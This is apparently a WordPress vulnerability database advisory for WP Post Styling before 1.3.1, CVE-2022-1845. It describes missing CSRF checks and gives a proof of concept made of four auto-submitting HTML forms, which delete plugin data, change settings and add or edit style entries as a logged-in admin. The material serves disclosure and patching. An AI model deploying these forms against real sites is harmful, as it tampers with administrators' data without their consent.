WordPress Plugin Vulnerabilities

WP Post Styling < 1.3.1 - Multiple CSRF

Description

The plugin does not have CSRF checks in various actions, which could allow attackers to make a logged in admin delete plugin's data, update the settings, add new entries and more via CSRF attacks

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling/wp-post-styling.php" method="POST">
    <input type="text" name="delete_style" value="1">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Yes, delete it!">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd-post-styling-screen" value="1">
    <input type="text" name="jd-post-styling-default" value="disable">
    <input type="text" name="jd-post-styling-library" value="disable">
    <input type="text" name="jd-post-styling-boxsize" value="6">
    <input type="text" name="submit-type" value="options">
    <input type="text" name="submit" value="Save WP Post Styling Options">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php&edit_style=1" method="POST">
    <input type="text" name="edit_style" value="1">
    <input type="text" name="jd_style_library_name" value="test">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Update WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd_style_library_name" value="test2">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Add to WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>

Affects Plugins

Plugin icon
wp-post-styling
Fixed in 1.3.1

References

CVE
CVE-2022-1845

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
6ee3e9e2-ff57-41c4-8cc5-b258801a8a02

Timeline

Publicly Published
2022-05-31 (about 1 years ago)
Added
2022-05-31 (about 1 years ago)
Last Updated
2023-02-27 (about 1 years ago)

Other

Published
Title
Published
2020-02-18
Title
Easy Property Listings < 3.4 - Cross-Site Request Forgery (CSRF)
Published
2017-01-28
Title
FormBuilder < 1.08 - Cross-Site Request Forgery (CSRF)
Published
2020-04-27
Title
Real-Time Find and Replace < 4.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
Published
2024-02-12
Title
Multi Step Form < 1.7.19 - Form Deletion via CSRF
Published
2023-12-05
Title
Fix My Feed RSS Repair <= 1.4 - Cross-Site Request Forgery